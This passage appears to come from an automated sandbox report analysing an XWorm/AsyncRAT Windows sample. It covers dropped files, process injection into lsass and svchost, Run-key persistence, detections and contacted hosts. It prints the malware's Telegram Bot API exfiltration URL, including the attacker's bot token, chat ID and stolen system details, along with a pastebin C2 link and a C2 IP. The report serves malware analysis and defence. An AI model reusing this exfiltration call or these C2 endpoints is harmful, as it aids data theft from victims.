                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575208 Sample: RdLfpZY5A9.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 52 ip-api.com 2->52 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 30 other signatures 2->84 9 RdLfpZY5A9.exe 4 2->9         started        13 powershell.exe 2 15 2->13         started        signatures3 process4 file5 42 C:\ProgramData\KrnlSetupSus.exe, PE32 9->42 dropped 44 C:\ProgramData\Install.exe, PE32 9->44 dropped 46 C:\Users\user\AppData\...\RdLfpZY5A9.exe.log, CSV 9->46 dropped 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->86 15 KrnlSetupSus.exe 15 6 9->15         started        20 Install.exe 1 9->20         started        88 Writes to foreign memory regions 13->88 90 Modifies the context of a thread in another process (thread injection) 13->90 92 Found suspicious powershell code related to unpacking or dynamic code loading 13->92 94 Injects a PE file into a foreign processes 13->94 22 dllhost.exe 1 13->22         started        24 conhost.exe 13->24         started        signatures6 process7 dnsIp8 54 ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States 15->54 56 115.69.183.222, 37593, 49716, 49718 TRUSTPOWERLTD-AS-APTrustPowerLtdNZ New Zealand 15->56 58 2 other IPs or domains 15->58 40 C:\ProgramData\ntoskrnl.exe, PE32 15->40 dropped 60 Antivirus detection for dropped file 15->60 62 Multi AV Scanner detection for dropped file 15->62 64 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->64 74 5 other signatures 15->74 26 powershell.exe 21 15->26         started        66 Machine Learning detection for dropped file 20->66 68 Injects code into the Windows Explorer (explorer.exe) 22->68 70 Contains functionality to inject code into remote processes 22->70 72 Writes to foreign memory regions 22->72 76 2 other signatures 22->76 29 lsass.exe 22->29 injected 31 svchost.exe 22->31 injected 33 svchost.exe 22->33 injected 36 30 other processes 22->36 file9 signatures10 process11 dnsIp12 96 Loading BitLocker PowerShell Module 26->96 38 conhost.exe 26->38         started        98 Installs new ROOT certificates 29->98 100 Creates files in the system32 config directory 29->100 102 Writes to foreign memory regions 29->102 104 System process connects to network (likely due to code injection or exploit) 31->104 48 pastebin.com 33->48 50 api.telegram.org 33->50 signatures13 106 Connects to a pastebin service (likely for C&C) 48->106 108 Uses the Telegram API (likely for C&C communication) 50->108 process14

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              RdLfpZY5A9.exe66%ReversingLabsWin32.Exploit.Xworm
                              RdLfpZY5A9.exe100%AviraTR/Dropper.Gen
                              RdLfpZY5A9.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\ntoskrnl.exe100%AviraTR/Spy.Gen
                              C:\ProgramData\KrnlSetupSus.exe100%AviraTR/Spy.Gen
                              C:\ProgramData\Install.exe100%AviraTR/Dropper.MSIL.Gen
                              C:\ProgramData\ntoskrnl.exe100%Joe Sandbox ML
                              C:\ProgramData\KrnlSetupSus.exe100%Joe Sandbox ML
                              C:\ProgramData\Install.exe100%Joe Sandbox ML
                              C:\ProgramData\Install.exe70%ReversingLabsByteCode-MSIL.Infostealer.Tinba
                              C:\ProgramData\KrnlSetupSus.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                              C:\ProgramData\ntoskrnl.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://excel.office.comcomverUX0%Avira URL Cloudsafe
                              https://excel.office.comcom0%Avira URL Cloudsafe
                              http://crl3.dX0%Avira URL Cloudsafe
                              http://cacerts.digicer0%Avira URL Cloudsafe
                              http://crl.mU0%Avira URL Cloudsafe
                              https://powerpoint.office.comSRD130%Avira URL Cloudsafe
                              https://excel.office.comcomD0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              ip-api.com
                              		208.95.112.1
                              		truefalse
                                		high
                                api.telegram.org
                                		149.154.167.220
                                		truefalse
                                  		high
                                  pastebin.com
                                  		104.20.4.235
                                  		truefalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikkafalse
                                      		high
                                      https://pastebin.com/raw/Zx6DUkf9false
                                        		high
                                        http://ip-api.com/line/?fields=hostingfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://cacerts.digicerlsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1499817567.000001A84BBE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.orgKrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/botRdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.drfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://excel.office.comcomverUXsvchost.exe, 00000026.00000002.2851123879.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.mUpowershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://go.micropowershell.exe, 00000004.00000002.1460763535.000001A83CB18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.office.com/pwaimagessvchost.exe, 00000026.00000003.1868296432.000001E73150D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1868219050.000001E73150B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1879111396.000001E73150F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867927983.000001E731506000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867055083.000001E731284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1631048778.000001E731284000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://excel.office.comsvchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.microsvchost.exe, 00000014.00000000.1529745173.000001486A5B0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=59991KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crl.mpowershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://excel.office.comSRD1%svchost.exe, 00000026.00000002.2806525834.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865572552.000001E7315D7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1627188967.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://contoso.com/powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://powerpoint.office.comSRD13svchost.exe, 00000026.00000002.2847177850.000001E731665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://outlook.comSRD1-svchost.exe, 00000026.00000000.1627319960.000001E730F3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2813637580.000001E730F43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1880000522.000001E730F41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://excel.office.comcomsvchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://word.office.comSRD1#svchost.exe, 00000026.00000003.1881507986.000001E7315C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.21.drfalse
                                                                                                  		high
                                                                                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl3.dXlsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://pastebin.comKrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://excel.office.comcomDsvchost.exe, 00000026.00000003.1890329925.000001E7311D6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            208.95.112.1
                                                                                                            		ip-api.comUnited States
                                                                                                            		53334TUT-ASUSfalse
                                                                                                            149.154.167.220
                                                                                                            		api.telegram.orgUnited Kingdom
                                                                                                            		62041TELEGRAMRUfalse
                                                                                                            115.69.183.222
                                                                                                            		unknownNew Zealand
                                                                                                            		55850TRUSTPOWERLTD-AS-APTrustPowerLtdNZfalse
                                                                                                            104.20.4.235
                                                                                                            		pastebin.comUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1575208
                                                                                                            Start date and time:2024-12-14 18:52:07 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 11m 13s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:11
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:33
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:RdLfpZY5A9.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.evad.winEXE@16/81@3/4
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 85.7%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 106
                                                                                                            • Number of non-executed functions: 215
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.190.147.2, 20.189.173.21
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, sls.update.microsoft.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                            • Execution Graph export aborted for target RdLfpZY5A9.exe, PID 7312 because it is empty
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7712 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                            • VT rate limit hit for: RdLfpZY5A9.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            12:53:04API Interceptor53x Sleep call for process: powershell.exe modified
                                                                                                            12:53:38API Interceptor407465x Sleep call for process: winlogon.exe modified
                                                                                                            12:53:39API Interceptor313180x Sleep call for process: lsass.exe modified
                                                                                                            12:53:40API Interceptor5412x Sleep call for process: svchost.exe modified
                                                                                                            12:53:42API Interceptor391643x Sleep call for process: dwm.exe modified
                                                                                                            12:53:43API Interceptor390x Sleep call for process: KrnlSetupSus.exe modified
                                                                                                            12:53:59API Interceptor138x Sleep call for process: spoolsv.exe modified
                                                                                                            12:54:08API Interceptor84x Sleep call for process: dllhost.exe modified
                                                                                                            18:53:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
                                                                                                            18:53:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
                                                                                                            18:54:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            208.95.112.17laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            boleto.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            taskhost.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            149.154.167.2203edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                  hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                          888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                            https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              XClient.exeGet hashmaliciousXWormBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                pastebin.comfile.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.4.235
                                                                                                                                CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                • 104.20.4.235
                                                                                                                                http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 104.20.3.235
                                                                                                                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.3.235
                                                                                                                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.4.235
                                                                                                                                rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.3.235
                                                                                                                                ip-api.com7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                boleto.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                taskhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                api.telegram.org3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 149.154.167.220

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                TELEGRAMRUfile.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
